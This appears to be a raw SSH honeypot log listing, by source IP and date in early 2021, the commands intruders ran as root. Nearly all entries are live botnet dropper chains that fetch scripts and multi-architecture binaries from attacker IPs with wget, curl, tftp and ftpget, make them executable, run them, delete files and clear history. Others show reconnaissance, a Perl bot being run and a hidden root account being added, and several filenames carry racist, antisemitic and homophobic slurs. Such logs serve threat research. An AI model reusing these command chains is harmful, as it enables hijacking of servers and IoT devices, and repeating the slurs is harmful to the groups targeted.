OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.ppc ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.ppc ; chmod 777 downloadthesebinsyoudirtyslut.ppc ; ./downloadthesebinsyoudirtyslut.ppc OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; rm -rf nigga* ; r9gj 193.239.147.226/bot.pl ; perl bot.pl ; curl -O 193.239.147.226/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
cat /etc/issue
wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86
chmod 777 downloadthesebinsyoudirtyslut.x86
./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777 nigga
./ OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips
chmod 777 downloadthesebinsyoudirtyslut.mips
./downloadthesebinsyoudirtyslut.mips otherbinexecxdlmfao
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm4
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm4
chmod 777 downloadthesebinsyoudirtyslut.arm4
./downloadthesebinsyoudirtyslut.arm4 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm5
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5
chmod 777 downloadthesebinsyoudirtyslut.arm5
./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
chmod 777 downloadthesebinsyoudirtyslut.arm6
./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm7
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7
chmod 777 downloadthesebinsyoudirtyslut.arm7
./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.ppc
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.ppc
chmod 777 downloadthesebinsyoudirtyslut.ppc
./downloadthesebinsyoudirtyslut.ppc OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
rm -rf nigga*
r9gj 193.239.147.226/bot.pl
perl bot.pl
curl -O 193.239.147.226/bot.pl
perl bot.pl
rm -rf bot*
rm -rf bot*
history -c

From 151.115.42.108 18-Jan-2021 01:13:54 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://162.216.7.148/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 162.216.7.148 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 162.216.7.148; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 162.216.7.148 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://162.216.7.148/bins.sh
chmod 777 bins.sh
sh bins.sh
tftp 162.216.7.148 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 162.216.7.148
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 162.216.7.148 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 185.239.242.109 18-Jan-2021 04:24:10 ssh2 root
Exec cd /tmp; wget http://46.29.163.64/host.sh; chmod 777 host.sh; sh host.sh; tftp 46.29.163.64 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.29.163.64; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *;

cd /tmp
wget http://46.29.163.64/host.sh
chmod 777 host.sh
sh host.sh
tftp 46.29.163.64 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 46.29.163.64
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 68.183.177.78 18-Jan-2021 05:05:58 ssh2 root
Exec cd /tmp  cd /dev  cd /mnt  cd /var; wget http://194.87.138.179/sh; curl -O http://194.87.138.179/sh; chmod 777 sh; ./sh; rm -rf sh
cd /tmp cd /dev cd /mnt cd /var
wget http://194.87.138.179/sh
curl -O http://194.87.138.179/sh
chmod 777 sh
./sh
rm -rf sh

From 82.79.152.57 19-Jan-2021 04:17:45 ssh2 root
w
free -mt
nproc
ls -a
cat /etc/issue
ifconfig
ls -a
rm -rf .*
rm -rf *
ls -a
cd /var/tmp
ls -a
clear
uptime
clear
yum update
apt update
apt-get
apt-get update
clear
clear

From 82.79.152.57 19-Jan-2021 04:19:16 ssh2 root
ls -a
ls
rm -rf *
ls -a
ls
clear
cat te
reboot
halt

From 142.44.222.33 20-Jan-2021 04:20:17 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.239.242.88/zeros6x.sh; curl -O http://185.239.242.88/zeros6x.sh; chmod 777 zeros6x.sh; sh zeros6x.sh; tftp 185.239.242.88 -c get zeros6x.sh; chmod 777 zeros6x.sh; sh zeros6x.sh; tftp -r zeros6x2.sh -g 185.239.242.88; chmod 777 zeros6x2.sh; sh zeros6x2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.239.242.88 zeros6x1.sh zeros6x1.sh; sh zeros6x1.sh; rm -rf zeros6x.sh zeros6x.sh zeros6x2.sh zeros6x1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.239.242.88/zeros6x.sh
curl -O http://185.239.242.88/zeros6x.sh
chmod 777 zeros6x.sh
sh zeros6x.sh
tftp 185.239.242.88 -c get zeros6x.sh
chmod 777 zeros6x.sh
sh zeros6x.sh
tftp -r zeros6x2.sh -g 185.239.242.88
chmod 777 zeros6x2.sh
sh zeros6x2.sh
ftpget -v -u anonymous -p anonymous -P 21 185.239.242.88 zeros6x1.sh zeros6x1.sh
sh zeros6x1.sh
rm -rf zeros6x.sh zeros6x.sh zeros6x2.sh zeros6x1.sh
rm -rf *

From 23.94.186.31 20-Jan-2021 09:32:38 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/774171000073355309/793874993091051549/fatnigger.x86; curl -O https://cdn.discordapp.com/attachments/774171000073355309/793874993091051549/fatnigger.x86; chmod 777 * ;./fatnigger.x86 root
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget https://cdn.discordapp.com/attachments/774171000073355309/793874993091051549/fatnigger.x86
curl -O https://cdn.discordapp.com/attachments/774171000073355309/793874993091051549/fatnigger.x86
chmod 777 *
./fatnigger.x86 root

From 185.239.242.104 22-Jan-2021 06:23:38 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.245.85/Heisenbergbins.sh; chmod 777 Heisenbergbins.sh; sh Heisenbergbins.sh; tftp 104.168.245.85 -c get Heisenbergtftp1.sh; chmod 777 Heisenbergtftp1.sh; sh Heisenbergtftp1.sh; tftp -r Heisenbergtftp2.sh -g 104.168.245.85; chmod 777 Heisenbergtftp2.sh; sh Heisenbergtftp2.sh; rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.245.85/Heisenbergbins.sh
chmod 777 Heisenbergbins.sh
sh Heisenbergbins.sh
tftp 104.168.245.85 -c get Heisenbergtftp1.sh
chmod 777 Heisenbergtftp1.sh
sh Heisenbergtftp1.sh
tftp -r Heisenbergtftp2.sh -g 104.168.245.85
chmod 777 Heisenbergtftp2.sh
sh Heisenbergtftp2.sh
rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh
rm -rf *

From 193.239.147.226 22-Jan-2021 16:19:57 ssh2 root
Exec cat /etc/issue ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; chmod 777 downloadthesebinsyoudirtyslut.x86 ; ./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86 ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; chmod 777 niggadownloadthesebinsyoudirtyslut.mips ; ./downloadthesebinsyoudirtyslut.mips OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ otherbinexecxdlmfao ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm4 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm4 ; chmod 777 downloadthesebinsyoudirtyslut.arm4 ; ./downloadthesebinsyoudirtyslut.arm4 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm5 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5 ; chmod 777 downloadthesebinsyoudirtyslut.arm5 ; ./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; chmod 777 downloadthesebinsyoudirtyslut.arm6 ; ./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm7 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7 ; chmod 777 downloadthesebinsyoudirtyslut.arm7 ; ./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; rm -rf nigga* ; r9gj 193.239.147.226/bot.pl ; perl bot.pl ; curl -O 193.239.147.226/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
cat /etc/issue
wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86
chmod 777 downloadthesebinsyoudirtyslut.x86
./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86
wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips
chmod 777 niggadownloadthesebinsyoudirtyslut.mips
./downloadthesebinsyoudirtyslut.mips OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ otherbinexecxdlmfao
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm4
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm4
chmod 777 downloadthesebinsyoudirtyslut.arm4
./downloadthesebinsyoudirtyslut.arm4 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm5
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5
chmod 777 downloadthesebinsyoudirtyslut.arm5
./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
chmod 777 downloadthesebinsyoudirtyslut.arm6
./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm7
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7
chmod 777 downloadthesebinsyoudirtyslut.arm7
./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
rm -rf nigga*
r9gj 193.239.147.226/bot.pl
perl bot.pl
curl -O 193.239.147.226/bot.pl
perl bot.pl
rm -rf bot*
rm -rf bot*
history -c

From 116.199.101.225 27-Jan-2021 01:11:50 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime

From 116.199.101.225 27-Jan-2021 01:11:50 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime

From 116.199.101.225 27-Jan-2021 01:11:50 ssh2 root
Exec cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
cat /proc/uptime

From 116.199.101.225 27-Jan-2021 01:11:52 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime

From 90.255.231.176 27-Jan-2021 18:42:52 ssh2 root
cat /proc/cpuinfo | grep name | wc -l
exit

From 51.161.31.128 27-Jan-2021 19:34:32 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.239.242.175/Pemex.sh; curl -O http://185.239.242.175/Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp 185.239.242.175 -c get Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp -r Pemex2.sh -g 185.239.242.175; chmod 777 Pemex2.sh; sh Pemex2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.239.242.175 Pemex1.sh Pemex1.sh; sh Pemex1.sh; rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.239.242.175/Pemex.sh
curl -O http://185.239.242.175/Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp 185.239.242.175 -c get Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp -r Pemex2.sh -g 185.239.242.175
chmod 777 Pemex2.sh
sh Pemex2.sh
ftpget -v -u anonymous -p anonymous -P 21 185.239.242.175 Pemex1.sh Pemex1.sh
sh Pemex1.sh
rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh
rm -rf *

From 206.166.251.64 27-Jan-2021 23:48:26 ssh2 root
Exec cd /tmp || cd /; wget -q http://172.245.81.107/cometome; cat cometome > vegaiscoming; chmod +x vegaiscoming; ./vegaiscoming
cd /tmp || cd /
wget -q http://172.245.81.107/cometome
cat cometome > vegaiscoming
chmod +x vegaiscoming
./vegaiscoming

From 23.94.186.6 28-Jan-2021 10:15:04 ssh2 root
Exec cat /etc/issue ; cwget https://cdn.discordapp.com/attachments/788792529372839956/791041217654947910/fatnigger.x86 --no-check-certificate -c ; chmod 777 fatnigger.x86 ; ./fatnigger.x86 root
cat /etc/issue
cwget https://cdn.discordapp.com/attachments/788792529372839956/791041217654947910/fatnigger.x86 --no-check-certificate -c
chmod 777 fatnigger.x86
./fatnigger.x86 root

From 111.18.172.94 28-Jan-2021 14:40:12 ssh2 root
ls
wget http://64.32.4.4:452/python

From 111.18.172.94 28-Jan-2021 14:42:46 ssh2 root
ls
yum -y install wget
wget yum -y install wget
wget http://64.32.4.4:452/python
wget http://64.32.4.4:452/python -c

From 185.117.119.189 29-Jan-2021 20:45:32 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.48.55/x86; curl -O http://209.141.48.55/x86; cat x86 > 0x3a13a141f0c; chmod +x *; ./0x3a13a141f0c Exploit.x86.BadWolf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.48.55/x86
curl -O http://209.141.48.55/x86
cat x86 > 0x3a13a141f0c
chmod +x *
./0x3a13a141f0c Exploit.x86.BadWolf

From 104.248.200.235 30-Jan-2021 10:40:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.173.171.123/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 107.173.171.123 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.173.171.123; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.173.171.123/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 107.173.171.123 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 107.173.171.123
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 104.248.198.248 30-Jan-2021 23:07:01 ssh2 root
Exec wget http://37.46.150.46/KillerSecurity/K1lLeR.x86; chmod 777 K1lLeR.x86; ./K1lLeR.x86 root; rm -rf K1lLeR.x86; history -c
wget http://37.46.150.46/KillerSecurity/K1lLeR.x86
chmod 777 K1lLeR.x86
./K1lLeR.x86 root
rm -rf K1lLeR.x86
history -c

From 185.239.242.158 31-Jan-2021 19:53:16 ssh2 root
Exec wget http://transfer.sh/get/kanEU/wkomqp; chmod 777 *; ./wkomqp
wget http://transfer.sh/get/kanEU/wkomqp
chmod 777 *
./wkomqp

From 205.185.125.189 31-Jan-2021 23:08:38 ssh2 root
Exec cat /etc/issue; wget http://45.130.138.17/s.sh; sh s.sh; echo llo
cat /etc/issue
wget http://45.130.138.17/s.sh
sh s.sh
echo llo

From 206.189.80.67 31-Jan-2021 23:33:07 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://45.145.185.10/sh.sh; chmod 777 sh.sh; sh sh.sh; tftp 45.145.185.10 -c get ab.sh; chmod 777 ab.sh; sh ab.sh; tftp -r ac.sh -g 45.145.185.10; chmod 777 ac.sh; sh ac.sh; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.10 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf sh.sh ab.sh ac.sh ftp1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://45.145.185.10/sh.sh
chmod 777 sh.sh
sh sh.sh
tftp 45.145.185.10 -c get ab.sh
chmod 777 ab.sh
sh ab.sh
tftp -r ac.sh -g 45.145.185.10
chmod 777 ac.sh
sh ac.sh
ftpget -v -u anonymous -p anonymous -P 21 45.145.185.10 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf sh.sh ab.sh ac.sh ftp1.sh
rm -rf *

From 146.255.75.61 1-Feb-2021 00:04:14 ssh2 root
w
cd /home
ls

From 13.78.132.59 1-Feb-2021 00:30:34 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://40.123.250.140/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 40.123.250.140 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://40.123.250.140/ISIS.sh
chmod 777 *
sh ISIS.sh
tftp -g 40.123.250.140 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 223.119.31.229 1-Feb-2021 14:40:16 ssh2 root
Exec uname -a & lscpu ; curl -O http://51.91.78.140/s.txt ; perl s.txt ; rm -rf s.txt
uname -a
lscpu
curl -O http://51.91.78.140/s.txt
perl s.txt
rm -rf s.txt

From 205.185.125.189 2-Feb-2021 03:16:35 ssh2 root
Exec cat /etc/issue; echo unstable is faggot
cat /etc/issue
echo unstable is faggot

From 185.239.242.104 2-Feb-2021 12:23:10 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.245.85/Heisen123bins.sh; chmod 777 Heisen123bins.sh; sh Heisen123bins.sh; tftp 104.168.245.85 -c get Heisen123tftp1.sh; chmod 777 Heisen123tftp1.sh; sh Heisen123tftp1.sh; tftp -r Heisen123tftp2.sh -g 104.168.245.85; chmod 777 Heisen123tftp2.sh; sh Heisen123tftp2.sh; rm -rf Heisen123bins.sh Heisen123tftp1.sh Heisen123tftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.245.85/Heisen123bins.sh
chmod 777 Heisen123bins.sh
sh Heisen123bins.sh
tftp 104.168.245.85 -c get Heisen123tftp1.sh
chmod 777 Heisen123tftp1.sh
sh Heisen123tftp1.sh
tftp -r Heisen123tftp2.sh -g 104.168.245.85
chmod 777 Heisen123tftp2.sh
sh Heisen123tftp2.sh
rm -rf Heisen123bins.sh Heisen123tftp1.sh Heisen123tftp2.sh
rm -rf *

From 138.68.83.217 2-Feb-2021 22:24:06 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.87.139.159/8UsA.sh; curl -O http://194.87.139.159/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 194.87.139.159 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 194.87.139.159; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.87.139.159 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.87.139.159/8UsA.sh
curl -O http://194.87.139.159/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 194.87.139.159 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 194.87.139.159
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.87.139.159 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 91.219.236.190 2-Feb-2021 22:29:43 ssh2 root
w
uname -a
passwd
nproc
ls -a
nproc
ip a|grep glo
ip a|grep glo
uname -a
cd /var/tmp
ls -a
ls -a
wget dauporno.do.amx1.txt
wget dauporno.do.am/x1.txt
curl -O dauporno.do.am/x1.txt
ls -a
ps -x
cd /var/tmp
ls -a
ls -a

From 91.219.236.190 2-Feb-2021 22:34:04 ssh2 root
unamme -a
/sbin/ifconfig |grep inet
ls -a
ps -x
wget
history
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
nproc
ls -a
ls -a
ls
nano test1.pl
vi test1.pl
vim test1.pl

From 141.98.80.98 2-Feb-2021 22:38:41 ssh2 root
ps -x
nproc
ps -x

From 97.127.136.197 2-Feb-2021 22:41:44 ssh2 root
Exec /ip cloud print
/ip cloud print
curl -o
apt install curl
curl -O
apt remove curl
apt delete curl
apt install wget
wget
wget --continue
wget -c
wget --no-check-certificate dauporno.do.am/x1.txt
ftp
curl -O
wget
uname -a
nproc
uptime

From 185.100.87.206 2-Feb-2021 22:46:35 ssh2 root
apt-get update
apt update
w
history
ps -x
uname -a
passwd
chpasswd
passwd
passsword
password

From 195.3.147.47 2-Feb-2021 22:48:56 ssh2 root
/usr/sbin/useradd -o -u 0 bash
/sbin/ifconfig
cat /etc/passwd
ssh -V

From 91.219.236.190 2-Feb-2021 22:50:37 ssh2 root
/etc/sudoders
cat /etc/sudoders
chsh -s /bin/bash root
chsh -s /bin/bash admin

From 95.19.252.139 2-Feb-2021 23:26:10 ssh2 root
w
cd /home ls
ls nproc
ps -x
cd ..
ls -a
cat /proc/cpuinfo
ifconfig
w

From 141.98.80.98 2-Feb-2021 23:28:58 ssh2 root
cat /etc/issue
exit

From 91.219.236.190 2-Feb-2021 23:36:18 ssh2 root
w
ss
c
f
s
w
w
ww
nproc
w

From 51.75.67.82 2-Feb-2021 23:39:07 ssh2 root
ls -as
ps aux
set +o history
ls -as
ls -as
cd .kde2
ls
perl network.pl
exit

From 95.19.252.139 3-Feb-2021 14:15:32 ssh2 root
bash
ls -a
ls -a
cat .bash_history
cat /dev/null > .bash_history
cd .ssh
ls
cat nsmail
cat reglas
./test.pl
cd /var/tmp
ls -a
cd /test
ls
ls -a
cd /home
ls
nproc
unreadsnf
cd
cd /dev/sh.
cd
wget
cd /dev/shm
ls
cd
cd .ssh
ls
mkdir " .."
cat /etc/issue
uname -a
wget prg.do.am/scan/prgssh4.tgz
wget prg.do.am/scan/prgssh4.tgz prg.do.am/scan/prgssh4.tgz
wget prg.do.am/scan/prgssh4.tgz
exit

From 178.62.205.92 3-Feb-2021 15:22:17 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://145.239.220.46/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 145.239.220.46 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 145.239.220.46; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://145.239.220.46/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 145.239.220.46 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 145.239.220.46
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 206.189.96.248 4-Feb-2021 00:59:45 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.116.180.169/sh; curl -O http://51.116.180.169/sh; chmod 777 sh; sh sh; tftp 51.116.180.169 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 51.116.180.169; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 51.116.180.169 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.116.180.169/sh
curl -O http://51.116.180.169/sh
chmod 777 sh
sh sh
tftp 51.116.180.169 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 51.116.180.169
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 51.116.180.169 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 157.245.141.237 4-Feb-2021 14:59:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.105.79.99/bomba.sh; curl -O http://172.105.79.99/bomba.sh; chmod 777 bomba.sh; sh bomba.sh; tftp 172.105.79.99 -c get bomba.sh; chmod 777 bomba.sh; sh bomba.sh; tftp -r bomba2.sh -g 172.105.79.99; chmod 777 bomba2.sh; sh bomba2.sh; ftpget -v -u anonymous -p anonymous -P 21 172.105.79.99 bomba1.sh bomba1.sh; sh bomba1.sh; rm -rf bomba.sh bomba.sh bomba2.sh bomba1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://172.105.79.99/bomba.sh
curl -O http://172.105.79.99/bomba.sh
chmod 777 bomba.sh
sh bomba.sh
tftp 172.105.79.99 -c get bomba.sh
chmod 777 bomba.sh
sh bomba.sh
tftp -r bomba2.sh -g 172.105.79.99
chmod 777 bomba2.sh
sh bomba2.sh
ftpget -v -u anonymous -p anonymous -P 21 172.105.79.99 bomba1.sh bomba1.sh
sh bomba1.sh
rm -rf bomba.sh bomba.sh bomba2.sh bomba1.sh
rm -rf *

From 167.99.209.21 4-Feb-2021 18:11:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.210.175.41/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 192.210.175.41 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.210.175.41; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://192.210.175.41/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 192.210.175.41 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 192.210.175.41
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 167.99.43.248 5-Feb-2021 03:05:09 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.123.7.10/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 176.123.7.10 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 176.123.7.10; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
